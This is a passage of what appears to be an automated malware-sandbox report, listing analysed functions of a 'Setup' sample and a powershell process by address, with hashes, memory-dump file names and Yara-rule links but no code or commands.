                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                                                                              • Opcode ID: b09967ac5482500bc099009dc95111bd7cc7545dcabcf40ba633cd1a509d9f95
                                                                                                                                                                                                                                                              • Instruction ID: 6d3dbf41ab514a780600e581a914672663c4e31fe8430e64a2b7ffbf7cbab329
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: b09967ac5482500bc099009dc95111bd7cc7545dcabcf40ba633cd1a509d9f95
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: DB516274E00219DFCB08CF98C590AAEF7B2FF48314F20819AD815AB345D771AA56DB94
                                                                                                                                                                                                                                                              Function 02045095 Relevance: .1, Instructions: 92COMMON
                                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 00000000.00000002.1975465671.0000000002020000.00000040.00001000.00020000.00000000.sdmp, Offset: 02020000, based on PE: false
                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_2020000_Setup.jbxd
                                                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                                                                              • Opcode ID: 0be585645ce43cc78ca89f1a7dd579ac5c477d6bff83e0177187fd61fd827266
                                                                                                                                                                                                                                                              • Instruction ID: 258edf8bc15f339b8de73e01daad555ca2853295f5b68060f7b2d38f16dd1a20
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 0be585645ce43cc78ca89f1a7dd579ac5c477d6bff83e0177187fd61fd827266
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 5831287AE103145BDB1CCFA4DC917BEB7B2BB99304F564178DA05B7294EA746D008B90
                                                                                                                                                                                                                                                              Function 0203D073 Relevance: .1, Instructions: 87COMMON
                                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 00000000.00000002.1975465671.0000000002020000.00000040.00001000.00020000.00000000.sdmp, Offset: 02020000, based on PE: false
                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_2020000_Setup.jbxd
                                                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                                                                              • Opcode ID: a12686834cd232eb74e00dbfb76decbbfe41f97aff58b1ac44c1673590ee5d47
                                                                                                                                                                                                                                                              • Instruction ID: d81f4bcbfa44230278917421e0669f4330ea2c20d759269b71f2d1b807f9bfd3
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: a12686834cd232eb74e00dbfb76decbbfe41f97aff58b1ac44c1673590ee5d47
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 9F216A325093814BD7038B2CD8903BAFBE5DFA2215F18446EE4D09B292E73085059752
                                                                                                                                                                                                                                                              Function 02047B61 Relevance: .1, Instructions: 81COMMON
                                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 00000000.00000002.1975465671.0000000002020000.00000040.00001000.00020000.00000000.sdmp, Offset: 02020000, based on PE: false
                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_2020000_Setup.jbxd
                                                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                                                                              • Opcode ID: 2b25fbcba02716181fd35e8033f0c95b2f5ad262ecb74bb202c6a9ce87f34bda
                                                                                                                                                                                                                                                              • Instruction ID: 4900e0c636716ae2d53924669f73e483340380db922b39ad086fe7b9f771d7ac
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 2b25fbcba02716181fd35e8033f0c95b2f5ad262ecb74bb202c6a9ce87f34bda
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 5D217DF7A59B118BD324CF6C88856AAF3E3BFC0604F6BC57CD9A4A7164DB348A04C641
                                                                                                                                                                                                                                                              Function 020486F9 Relevance: .1, Instructions: 67COMMON
                                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 00000000.00000002.1975465671.0000000002020000.00000040.00001000.00020000.00000000.sdmp, Offset: 02020000, based on PE: false
                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_2020000_Setup.jbxd
                                                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                                                                              • Opcode ID: 11c1d8b879460f9450c466dec8e863d687c204cfcdc329f7ed8d98df45aee035
                                                                                                                                                                                                                                                              • Instruction ID: 589fb0d32612efb8a88f161dc99ca3723056d3d39b779936cde773e65c916e35
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 11c1d8b879460f9450c466dec8e863d687c204cfcdc329f7ed8d98df45aee035
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 34114CB6A143109FF7548F24CCD593B7792EBC5724F58E83DD48253511DB70D8019B06
                                                                                                                                                                                                                                                              Function 02020FB8 Relevance: .1, Instructions: 66COMMON
                                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 00000000.00000002.1975465671.0000000002020000.00000040.00001000.00020000.00000000.sdmp, Offset: 02020000, based on PE: false
                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_2020000_Setup.jbxd
                                                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                                                                              • Opcode ID: 4e64317625e06953a0030493f718403388be9115d8c6a0e5777c3d8d6dbedd3d
                                                                                                                                                                                                                                                              • Instruction ID: d11c0b8cf06a1f2cc177d8a7911d750331cf0ae5fd1972a243bbb999c9e1cfae
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 4e64317625e06953a0030493f718403388be9115d8c6a0e5777c3d8d6dbedd3d
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: C231A774E00219DFCB08CF98C590AAEFBB1FF48314F20859AD815AB342D371AA46DF90
                                                                                                                                                                                                                                                              Function 02036E83 Relevance: .1, Instructions: 65COMMON
                                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 00000000.00000002.1975465671.0000000002020000.00000040.00001000.00020000.00000000.sdmp, Offset: 02020000, based on PE: false
                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_2020000_Setup.jbxd
                                                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                                                                              • Opcode ID: fb662bde4548482ee50dfe35a63be87db26bd9a36937787f848b1f5cdf819add
                                                                                                                                                                                                                                                              • Instruction ID: de1f43226069cb64abd20ca74c8f396d877deb150cf2f3c75f50d9cd99786d95
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: fb662bde4548482ee50dfe35a63be87db26bd9a36937787f848b1f5cdf819add
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 3A112076648300AFE769CB11CC9173BF3E6EBC6314F08C03CE68297242E27198119B4A
                                                                                                                                                                                                                                                              Function 0204A232 Relevance: .1, Instructions: 64COMMON
                                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 00000000.00000002.1975465671.0000000002020000.00000040.00001000.00020000.00000000.sdmp, Offset: 02020000, based on PE: false
                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_2020000_Setup.jbxd
                                                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                                                                              • Opcode ID: 72c2dfb32b018651f33052a7ead6e9aae5d2cf6c1d9e93501d01160a84d5243c
                                                                                                                                                                                                                                                              • Instruction ID: 3f4300e03a1ec8d537be3b969c47071000f7e5784da8ea4db2d0ffa3b12c0f56
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 72c2dfb32b018651f33052a7ead6e9aae5d2cf6c1d9e93501d01160a84d5243c
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 5311E3B6B58300ABD7688F14C95093FB3A2FBC9750F19993CD88203614D730EC029BD6
                                                                                                                                                                                                                                                              Function 02036AE9 Relevance: .1, Instructions: 63COMMON
                                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 00000000.00000002.1975465671.0000000002020000.00000040.00001000.00020000.00000000.sdmp, Offset: 02020000, based on PE: false
                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_2020000_Setup.jbxd
                                                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                                                                              • Opcode ID: 1fb4ff03121de78a46e76d5bd1b1cd628a260b80221ec1c216c2e2afddf62a91
                                                                                                                                                                                                                                                              • Instruction ID: 132d1c6d3c02e5c54b7c542d2a17bfd6f40f2e1dfb811d5c5450cd074d4bff79
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 1fb4ff03121de78a46e76d5bd1b1cd628a260b80221ec1c216c2e2afddf62a91
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: DA012875388300ABE76A9F249E42B7BB3B6D7C6700F15903CD242571A1FA7294A19E0E
                                                                                                                                                                                                                                                              Function 0204CB76 Relevance: .1, Instructions: 63COMMON
                                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 00000000.00000002.1975465671.0000000002020000.00000040.00001000.00020000.00000000.sdmp, Offset: 02020000, based on PE: false
                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_2020000_Setup.jbxd
                                                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                                                                              • Opcode ID: 028bd4e4700371b1e03128376186f9cba1fabeb77cd684cab99761d2d718c822
                                                                                                                                                                                                                                                              • Instruction ID: 894db75850b4d3423fe28bae9461a069a389fb5e816fc7466521b34bdf9bdffe
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 028bd4e4700371b1e03128376186f9cba1fabeb77cd684cab99761d2d718c822
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 7A011EF2A0230157E621AE6698C0B67B3F96F85744F18843FD94557200EF65E809AAE6
                                                                                                                                                                                                                                                              Function 0202EFE0 Relevance: .1, Instructions: 55COMMON
                                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 00000000.00000002.1975465671.0000000002020000.00000040.00001000.00020000.00000000.sdmp, Offset: 02020000, based on PE: false
                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_2020000_Setup.jbxd
                                                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                                                                              • Opcode ID: 5beead94d6d3db6f2cdb10cfe9d0fc81ef83d50278c7010f7b367f3fc6df70ac
                                                                                                                                                                                                                                                              • Instruction ID: bb2f78ec10f840e56c708f24dec1c573a250f5acdb1891864daf2cc60dca8aa6
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 5beead94d6d3db6f2cdb10cfe9d0fc81ef83d50278c7010f7b367f3fc6df70ac
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: DC014573748311DBE778CB44C98573BB3B2EB95304F08913EC5829BA02C331A8118B9A
                                                                                                                                                                                                                                                              Function 02048786 Relevance: .1, Instructions: 51COMMON
                                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 00000000.00000002.1975465671.0000000002020000.00000040.00001000.00020000.00000000.sdmp, Offset: 02020000, based on PE: false
                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_2020000_Setup.jbxd
                                                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                                                                              • Opcode ID: 9f34c2a12318c80653b644e0df530461b52dca7aa5ab19197c5989bb467eb6a9
                                                                                                                                                                                                                                                              • Instruction ID: 95d08a693b79ddc27083858008da7dd21322080dfb175bcbf448d061e7873c2f
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 9f34c2a12318c80653b644e0df530461b52dca7aa5ab19197c5989bb467eb6a9
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: D901007AA183509BE755CF28CC8552BB7E2AB89724F08E83DE4C693205DB70D8018B4A
                                                                                                                                                                                                                                                              Function 02047756 Relevance: .0, Instructions: 44COMMON
                                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 00000000.00000002.1975465671.0000000002020000.00000040.00001000.00020000.00000000.sdmp, Offset: 02020000, based on PE: false
                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_2020000_Setup.jbxd
                                                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                                                                              • Opcode ID: 895db481594b5c578abab763c4d1ed4c636c231454d77e82d2a3c9ee13117793
                                                                                                                                                                                                                                                              • Instruction ID: 1badb4efe3ac83f4c795bbe07e98f914c9df54d2632755ea49ef9aebe24dd4db
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 895db481594b5c578abab763c4d1ed4c636c231454d77e82d2a3c9ee13117793
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: E5019275509300DBD755CB258940D3BF7F2EBC9724F64967CD99127261D730EC029B8A
                                                                                                                                                                                                                                                              Function 02020D19 Relevance: .0, Instructions: 33COMMON
                                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 00000000.00000002.1975465671.0000000002020000.00000040.00001000.00020000.00000000.sdmp, Offset: 02020000, based on PE: false
                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_2020000_Setup.jbxd
                                                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                                                                              • Opcode ID: 2f432f6d4d57ddd5edf10f0a55197208a6667e030cc273150dee4b63bd6a15e3
                                                                                                                                                                                                                                                              • Instruction ID: dc97903810448bf53709fdc8eb7ba97089e91f30402669880787ffc7e8da6a27
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 2f432f6d4d57ddd5edf10f0a55197208a6667e030cc273150dee4b63bd6a15e3
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 9001D634A02208EFCB55DF98C184AACF7B6EB54310F60869AD8056B794C331BE45EB40
                                                                                                                                                                                                                                                              Function 020491D5 Relevance: .0, Instructions: 24COMMON
                                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 00000000.00000002.1975465671.0000000002020000.00000040.00001000.00020000.00000000.sdmp, Offset: 02020000, based on PE: false
                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_2020000_Setup.jbxd
                                                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                                                                              • Opcode ID: 3857245d95dc7d60960db152af2162b310b59fa82b8c077125f4149e5b5f4df5
                                                                                                                                                                                                                                                              • Instruction ID: 788e52051c6cd2577fb0021ac5749057b4fabdaad6123c3283dea5c83300648f
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 3857245d95dc7d60960db152af2162b310b59fa82b8c077125f4149e5b5f4df5
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: A9E0CDB980C7EEC64B164F1818A41B6FBA15B47748B0985BD98C13F565CF21C907E798
                                                                                                                                                                                                                                                              Function 0204A6B0 Relevance: .0, Instructions: 19COMMON
                                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 00000000.00000002.1975465671.0000000002020000.00000040.00001000.00020000.00000000.sdmp, Offset: 02020000, based on PE: false
                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_2020000_Setup.jbxd
                                                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                                                                              • Opcode ID: 427ddb74f11696e00ab71b05ccc6580c75431f573bdbffb3bd6721a8101804cb
                                                                                                                                                                                                                                                              • Instruction ID: 9e45953fe8f3c6735caab554e36dc226414d8c864129e51b14fd33f67a369186
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 427ddb74f11696e00ab71b05ccc6580c75431f573bdbffb3bd6721a8101804cb
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 53E0E274A08301CBD708CF18D8A092AF3F1FB8A314F14986CE996A7351D731EC11CB19
                                                                                                                                                                                                                                                              Function 020370CA Relevance: .0, Instructions: 12COMMON
                                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 00000000.00000002.1975465671.0000000002020000.00000040.00001000.00020000.00000000.sdmp, Offset: 02020000, based on PE: false
                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_2020000_Setup.jbxd
                                                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                                                                              • Opcode ID: 4aab6d9f553735fd478753e9e413c2d9be310b6467492b2bb354838cb01df672
                                                                                                                                                                                                                                                              • Instruction ID: a5cd0330758b6e7fb32e28e1f9b56b9525c5ac93eb8f4712a17dafe6898be874
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 4aab6d9f553735fd478753e9e413c2d9be310b6467492b2bb354838cb01df672
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 94C04C30618350ABC751DF94D944C7BFBF6BF8F301F002818B188D3121D661D810DB1A
                                                                                                                                                                                                                                                              Function 0204A20E Relevance: .0, Instructions: 11COMMON
                                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 00000000.00000002.1975465671.0000000002020000.00000040.00001000.00020000.00000000.sdmp, Offset: 02020000, based on PE: false
                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_2020000_Setup.jbxd
                                                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                                                                              • Opcode ID: b4571ed09540ee29db77367263a51cdf37e96f114ce63285eb230035e7978b70
                                                                                                                                                                                                                                                              • Instruction ID: 4471cfd2177c50f712e358faf1045e246c633932838c6f3816bb787ac3893d4c
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: b4571ed09540ee29db77367263a51cdf37e96f114ce63285eb230035e7978b70
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: F2B09B65D0A660D7E5117F2158004BDB2755B47350F146476DC0533111DB14ED059DCF
                                                                                                                                                                                                                                                              Function 0204C671 Relevance: .0, Instructions: 9COMMON
                                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 00000000.00000002.1975465671.0000000002020000.00000040.00001000.00020000.00000000.sdmp, Offset: 02020000, based on PE: false
                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_2020000_Setup.jbxd
                                                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                                                                              • Opcode ID: 68f1eaf77135c9ac0c0301f0a44f4b34eead3b4864deb66a80c60461691756a4
                                                                                                                                                                                                                                                              • Instruction ID: c9e1edffe365351002a79e7e42f17160f8a4553f91059ca0b65643c3bc01f1ac
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 68f1eaf77135c9ac0c0301f0a44f4b34eead3b4864deb66a80c60461691756a4
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: DAB092B5C2824887D6009F12DC00475F2766B0B200F102822D409A3220D221D8199A0A
                                                                                                                                                                                                                                                              Function 0202CEBB Relevance: .0, Instructions: 9COMMON
                                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 00000000.00000002.1975465671.0000000002020000.00000040.00001000.00020000.00000000.sdmp, Offset: 02020000, based on PE: false
                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_2020000_Setup.jbxd
                                                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                                                                              • Opcode ID: 7846b210478bd6bc8b32f5eec40b2423980295201402e6b39a606593130646e8
                                                                                                                                                                                                                                                              • Instruction ID: 208a1207991caec9cbef5dd0ee3f2b0f91da29ab3cac51eb44f990c54b180101
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 7846b210478bd6bc8b32f5eec40b2423980295201402e6b39a606593130646e8
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: CFB00278854681DBC7141F20AC48865B639A607216F407470B506621229B34C4509A1D

                                                                                                                                                                                                                                                              Executed Functions

                                                                                                                                                                                                                                                              Function 07C11798 Relevance: 17.1, Strings: 13, Instructions: 826COMMON
                                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 00000002.00000002.1932726383.0000000007C10000.00000040.00000800.00020000.00000000.sdmp, Offset: 07C10000, based on PE: false
                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_7c10000_powershell.jbxd
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                                              • String ID: 4'kq$4'kq$4'kq$4'kq$4'kq$4'kq$tPkq$tPkq$$kq$$kq$$kq$k$k
                                                                                                                                                                                                                                                              • API String ID: 0-3274949686
                                                                                                                                                                                                                                                              • Opcode ID: 0d34a253c27f58d5a48413f505dc0304230a13a42e9b6a0ac07d80511ea63397
                                                                                                                                                                                                                                                              • Instruction ID: 59b627916c527fd863f1a9d863797b76afb955e774d607e5f0b3f887919c9ebe
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 0d34a253c27f58d5a48413f505dc0304230a13a42e9b6a0ac07d80511ea63397
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 8E426DB270435A8FC7159B69985066BBFA2AFC3350F28807BDA05CB351DB39CE41D7A1
                                                                                                                                                                                                                                                              Function 04D45E30 Relevance: .5, Instructions: 480COMMON
                                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 00000002.00000002.1922065981.0000000004D40000.00000040.00000800.00020000.00000000.sdmp, Offset: 04D40000, based on PE: false
                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_4d40000_powershell.jbxd
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                                                                              • Opcode ID: c9f65bb574ac857828658886d3c32c47bc7806abc7d482d64efda1720628585e
                                                                                                                                                                                                                                                              • Instruction ID: b0cf93d900ad6e0c2a2866e3c6010146de4edb208f2bc4d7987e00d600b96555
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: c9f65bb574ac857828658886d3c32c47bc7806abc7d482d64efda1720628585e
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: CF122A74A002099FCB14CF98D594AAEFBF2FF89310F258559E845AB365C735ED81CB90
                                                                                                                                                                                                                                                              Function 07C11A54 Relevance: .1, Instructions: 118COMMON
                                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 00000002.00000002.1932726383.0000000007C10000.00000040.00000800.00020000.00000000.sdmp, Offset: 07C10000, based on PE: false
                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_7c10000_powershell.jbxd
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                                                                              • Opcode ID: 8454aefd99a8628b05cd0696d8178916289b59da6b257965053a3efb75d03757
                                                                                                                                                                                                                                                              • Instruction ID: b64bc732368615e5cf1736b1c13e01643cf68c31f4cf726d4572fe7988ac94d7
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 8454aefd99a8628b05cd0696d8178916289b59da6b257965053a3efb75d03757
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 164117F1A1021A9FCB24CF658591A6A7BA2AF92380F1C80B5DF009B251E73DDA45D7E1
                                                                                                                                                                                                                                                              Function 04D433E0 Relevance: .1, Instructions: 111COMMON
                                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 00000002.00000002.1922065981.0000000004D40000.00000040.00000800.00020000.00000000.sdmp, Offset: 04D40000, based on PE: false
                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_4d40000_powershell.jbxd
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                              • API String ID:
